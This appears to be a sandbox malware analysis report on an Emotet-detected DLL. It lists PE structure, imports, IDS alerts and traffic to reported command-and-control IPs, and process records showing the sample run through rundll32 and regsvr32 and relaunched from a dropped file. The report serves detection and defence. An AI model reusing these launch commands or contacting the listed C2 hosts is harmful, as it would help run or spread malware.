IMAGE_DIRECTORY_ENTRY_IAT	0x3c000	0x668	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x487bc	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3a49e	0x3b000	False	0.6009418034957628	data	6.6116392367886405	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3c000	0xeaae	0xf000	False	0.32216796875	data	5.0465288460575035	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4b000	0x5cb8	0x3000	False	0.2513834635416667	data	3.8346109495878085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x51000	0x480a0	0x49000	False	0.5524534460616438	data	6.0777904674160155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0x8810	0x9000	False	0.3506673177083333	data	4.48951519417909	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
	0x747c0	0x20800	data
RT_CURSOR	0x95028	0x134	data
RT_CURSOR	0x95160	0xb4	data
RT_CURSOR	0x95240	0x134	AmigaOS bitmap font
RT_CURSOR	0x95390	0x134	data
RT_CURSOR	0x954e0	0x134	data
RT_CURSOR	0x95630	0x134	data
RT_CURSOR	0x95780	0x134	data
RT_CURSOR	0x958d0	0x134	data
RT_CURSOR	0x95a20	0x134	data
RT_CURSOR	0x95b70	0x134	data
RT_CURSOR	0x95cc0	0x134	data
RT_CURSOR	0x95e10	0x134	data
RT_CURSOR	0x95f60	0x134	AmigaOS bitmap font
RT_CURSOR	0x960b0	0x134	data
RT_CURSOR	0x96200	0x134	data
RT_CURSOR	0x96350	0x134	data
RT_BITMAP	0x522e0	0x428	data
RT_BITMAP	0x520c0	0xe0	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_BITMAP	0x965a0	0xb8	data
RT_BITMAP	0x96658	0x144	data
RT_ICON	0x52a98	0x10828	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x632d8	0x10828	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x73b18	0x2e8	data
RT_ICON	0x73e00	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x73f50	0x2e8	data
RT_ICON	0x74238	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x74388	0x2e8	data
RT_ICON	0x74670	0x128	GLS_BINARY_LSB_FIRST
RT_MENU	0x52728	0x23a	data
RT_MENU	0x521b0	0x46	data	Spanish	Mexico
RT_DIALOG	0x52968	0x12c	data
RT_DIALOG	0x521f8	0xe2	data	Spanish	Mexico
RT_DIALOG	0x964a0	0xfe	data
RT_STRING	0x96810	0x92	data
RT_STRING	0x967a0	0x6a	data	Spanish	Mexico
RT_STRING	0x968a8	0x48	data
RT_STRING	0x96938	0x19e	data
RT_STRING	0x96c08	0x280	data
RT_STRING	0x97010	0x39c	data
RT_STRING	0x96f90	0x7a	data
RT_STRING	0x96ad8	0x12e	data
RT_STRING	0x96e88	0x104	data
RT_STRING	0x968f0	0x46	data
RT_STRING	0x973b0	0x128	data
RT_STRING	0x974d8	0x240	data
RT_STRING	0x97718	0x9e	data
RT_STRING	0x977b8	0xb0	Hitachi SH big-endian COFF object file, not stripped, 16640 sections, symbol offset=0x69007200, 201344768 symbols, optional header size 29952
RT_STRING	0x97868	0x30	data
RT_STRING	0x97898	0x1d0	data
RT_STRING	0x97a68	0x5bc	data
RT_STRING	0x98418	0x31c	data
RT_STRING	0x98118	0x300	data
RT_STRING	0x98fa0	0xb0	data
RT_STRING	0x98028	0xee	data
RT_STRING	0x98e50	0x11e	data
RT_STRING	0x98738	0x4d0	data
RT_STRING	0x98c08	0x248	data
RT_STRING	0x98f70	0x2e	data
RT_STRING	0x99050	0x4c	data
RT_ACCELERATOR	0x94fc0	0x68	data
RT_GROUP_CURSOR	0x95218	0x22	Lotus unknown worksheet or configuration, revision 0x2
RT_GROUP_CURSOR	0x95a08	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x95378	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x958b8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x95768	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x96098	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x95618	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x95ca8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x954c8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x95b58	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x95df8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x95f48	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x961e8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x96338	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x96488	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0x632c0	0x14	data
RT_GROUP_ICON	0x73f28	0x22	data
RT_GROUP_ICON	0x73b00	0x14	data
RT_GROUP_ICON	0x74360	0x22	data
RT_GROUP_ICON	0x74798	0x22	data
None	0x52708	0x1e	data
None	0x521a0	0xa	data	Spanish	Mexico

Imports

DLL	Import
KERNEL32.dll	RtlUnwind, GetSystemTimeAsFileTime, GetCommandLineA, TerminateProcess, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, VirtualQuery, QueryPerformanceCounter, GetCurrentProcessId, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, SetStdHandle, SetEnvironmentVariableA, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapFree, HeapAlloc, GetTickCount, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, GetOEMCP, GetCPInfo, GetShortPathNameA, CreateFileA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetCurrentDirectoryA, GlobalFlags, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, CloseHandle, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, FreeLibrary, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, LoadLibraryA, FreeResource, SetLastError, GlobalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, lstrcpynA, LocalFree, ExitProcess, GetStringTypeExA, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, UnhandledExceptionFilter, InterlockedExchange
USER32.dll	KillTimer, WindowFromPoint, GetDCEx, LockWindowUpdate, RegisterClipboardFormatA, PostThreadMessageA, SetRect, CharNextA, DestroyIcon, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, LoadCursorA, GetSysColorBrush, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, IsZoomed, GetDC, ReleaseDC, LoadMenuA, DestroyMenu, UnpackDDElParam, ReuseDDElParam, ReleaseCapture, LoadAcceleratorsA, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, SetMenu, TranslateAcceleratorA, InvalidateRect, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, IsChild, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, TrackPopupMenu, SetForegroundWindow, SetTimer, GetClientRect, GetMenu, GetSysColor, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, UnregisterClassA, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, wsprintfA, GetWindowTextLengthA, GetWindowTextA, SetWindowPos, CharUpperA, UpdateWindow, EnableWindow, SendMessageA, GetClassInfoExA, GetSubMenu, GetMenuItemCount, InsertMenuA, GetMenuItemID, AppendMenuA, SetFocus, ShowWindow, MoveWindow, SetWindowLongA, GetDlgCtrlID, SetWindowTextA, IsDialogMessageA, SendDlgItemMessageA, GetMenuItemInfoA, InflateRect, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, MessageBeep, GetNextDlgGroupItem, SetCapture, InvalidateRgn, CopyAcceleratorTableA, GetMenuStringA, GetMenuState, EndDialog, GetNextDlgTabItem, GetParent, IsWindowEnabled, GetDlgItem, GetWindowLongA, IsWindow, DestroyWindow, CreateDialogIndirectParamA, GetSystemMetrics, SetActiveWindow, GetActiveWindow, GetDesktopWindow, PostQuitMessage, PostMessageA, SetCursor, ShowOwnedPopups, GetLastActivePopup, MessageBoxA, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, DispatchMessageA
GDI32.dll	CreateSolidBrush, CreateFontIndirectA, GetBkColor, GetTextColor, GetStockObject, GetRgnBox, PatBlt, SetRectRgn, CombineRgn, GetMapMode, CreatePatternBrush, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetPixel, BitBlt, GetWindowExtEx, CreateRectRgnIndirect, GetDeviceCaps, CreateRectRgn, SelectClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetBkMode, RestoreDC, SaveDC, GetTextExtentPoint32A, GetTextMetricsA, CreateFontA, GetCharWidthA, DeleteObject, SelectObject, StretchDIBits, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetViewportExtEx
comdlg32.dll	GetSaveFileNameA, GetFileTitleA, GetOpenFileNameA
WINSPOOL.DRV	OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll	GetFileSecurityA, RegSetValueA, RegOpenKeyA, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegCreateKeyA, RegCloseKey, SetFileSecurityA
SHELL32.dll	DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragFinish
COMCTL32.dll	ImageList_Draw, ImageList_GetImageInfo, ImageList_Destroy
SHLWAPI.dll	PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
oledlg.dll
ole32.dll	CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemFree, OleUninitialize, CoFreeUnusedLibraries, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard, CoRevokeClassObject, CoTaskMemAlloc, OleInitialize
OLEAUT32.dll	SysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysFreeString

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10005090
DllUnregisterServerr	2	0x100050c0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Mexico

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3119.193.124.414976570802404304 07/20/22-01:06:02.271940	TCP	2404304	ET CNC Feodo Tracker Reported CnC Server TCP group 3	49765	7080	192.168.2.3	119.193.124.41
192.168.2.351.91.76.894976380802404338 07/20/22-01:06:00.016852	TCP	2404338	ET CNC Feodo Tracker Reported CnC Server TCP group 20	49763	8080	192.168.2.3	51.91.76.89

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 20, 2022 01:05:38.382345915 CEST	49744	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.382380962 CEST	443	49744	70.36.102.35	192.168.2.3
Jul 20, 2022 01:05:38.382472038 CEST	49744	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.401314020 CEST	49744	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.401331902 CEST	443	49744	70.36.102.35	192.168.2.3
Jul 20, 2022 01:05:38.574548006 CEST	443	49744	70.36.102.35	192.168.2.3
Jul 20, 2022 01:05:38.578385115 CEST	49745	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.578444004 CEST	443	49745	70.36.102.35	192.168.2.3
Jul 20, 2022 01:05:38.578576088 CEST	49745	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.579086065 CEST	49745	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.579119921 CEST	443	49745	70.36.102.35	192.168.2.3
Jul 20, 2022 01:05:38.752664089 CEST	443	49745	70.36.102.35	192.168.2.3
Jul 20, 2022 01:05:38.761722088 CEST	49746	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.761790991 CEST	443	49746	70.36.102.35	192.168.2.3
Jul 20, 2022 01:05:38.761930943 CEST	49746	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.762278080 CEST	49746	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.762346983 CEST	443	49746	70.36.102.35	192.168.2.3
Jul 20, 2022 01:05:38.762423992 CEST	49746	443	192.168.2.3	70.36.102.35
Jul 20, 2022 01:05:38.814444065 CEST	49747	8080	192.168.2.3	92.240.254.110
Jul 20, 2022 01:05:41.920202971 CEST	49747	8080	192.168.2.3	92.240.254.110
Jul 20, 2022 01:05:47.935970068 CEST	49747	8080	192.168.2.3	92.240.254.110
Jul 20, 2022 01:06:00.016851902 CEST	49763	8080	192.168.2.3	51.91.76.89
Jul 20, 2022 01:06:00.039036989 CEST	8080	49763	51.91.76.89	192.168.2.3
Jul 20, 2022 01:06:00.561953068 CEST	49763	8080	192.168.2.3	51.91.76.89
Jul 20, 2022 01:06:00.584394932 CEST	8080	49763	51.91.76.89	192.168.2.3
Jul 20, 2022 01:06:01.093229055 CEST	49763	8080	192.168.2.3	51.91.76.89
Jul 20, 2022 01:06:01.115122080 CEST	8080	49763	51.91.76.89	192.168.2.3
Jul 20, 2022 01:06:01.128217936 CEST	49764	8080	192.168.2.3	217.182.25.250
Jul 20, 2022 01:06:01.158274889 CEST	8080	49764	217.182.25.250	192.168.2.3
Jul 20, 2022 01:06:01.659693003 CEST	49764	8080	192.168.2.3	217.182.25.250
Jul 20, 2022 01:06:01.689210892 CEST	8080	49764	217.182.25.250	192.168.2.3
Jul 20, 2022 01:06:02.202712059 CEST	49764	8080	192.168.2.3	217.182.25.250
Jul 20, 2022 01:06:02.232880116 CEST	8080	49764	217.182.25.250	192.168.2.3
Jul 20, 2022 01:06:02.271939993 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:06:02.537431002 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:02.537586927 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:06:02.538384914 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:06:02.804030895 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:02.819480896 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:02.819514990 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:02.819607973 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:06:05.037138939 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:06:05.300612926 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:05.301150084 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:06:05.304088116 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:06:05.610945940 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:06.458800077 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:06.458949089 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:06:09.460608959 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:09.460654020 CEST	7080	49765	119.193.124.41	192.168.2.3
Jul 20, 2022 01:06:09.460884094 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:07:28.336844921 CEST	49765	7080	192.168.2.3	119.193.124.41
Jul 20, 2022 01:07:28.336891890 CEST	49765	7080	192.168.2.3	119.193.124.41

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 6380, Parent PID: 3076

General

Target ID:	0
Start time:	01:05:13
Start date:	20/07/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll"
Imagebase:	0xa70000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6388, Parent PID: 6380

General

Target ID:	1
Start time:	01:05:13
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6400, Parent PID: 6380

General

Target ID:	2
Start time:	01:05:13
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\CUfsVUDkr6.dll
Imagebase:	0xb40000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.261732368.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.261732368.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.261764431.0000000004791000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.261764431.0000000004791000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6408, Parent PID: 6388

General

Target ID:	3
Start time:	01:05:14
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1
Imagebase:	0x970000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.258613972.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.258613972.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.258886140.00000000043A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.258886140.00000000043A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6420, Parent PID: 6380

General

Target ID:	4
Start time:	01:05:14
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\CUfsVUDkr6.dll,DllRegisterServer
Imagebase:	0x970000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.258847425.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.258847425.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.259038196.0000000004CE1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.259038196.0000000004CE1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6552, Parent PID: 6400

General

Target ID:	5
Start time:	01:05:17
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ofpagmb\vfvyklscua.sam"
Imagebase:	0xb40000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.774599292.00000000046C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.774599292.00000000046C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.774512688.0000000004690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.774512688.0000000004690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6588, Parent PID: 6380

General

Target ID:	6
Start time:	01:05:18
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\CUfsVUDkr6.dll,DllUnregisterServerr
Imagebase:	0x970000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6936, Parent PID: 568

General

Target ID:	10
Start time:	01:05:32
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6972, Parent PID: 568

General

Target ID:	11
Start time:	01:05:33
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 7040, Parent PID: 568

General

Target ID:	12
Start time:	01:05:34
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 7068, Parent PID: 568

General

Target ID:	13
Start time:	01:05:34
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 7120, Parent PID: 568

General

Target ID:	14
Start time:	01:05:35
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: SgrmBroker.exePID: 2492, Parent PID: 568

General

Target ID:	15
Start time:	01:05:35
Start date:	20/07/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff72e3a0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6248, Parent PID: 568

General

Target ID:	16
Start time:	01:05:36
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6484, Parent PID: 568

General

Target ID:	18
Start time:	01:05:40
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6388, Parent PID: 568

General

Target ID:	19
Start time:	01:05:47
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff73c930000
File size:	51288 bytes
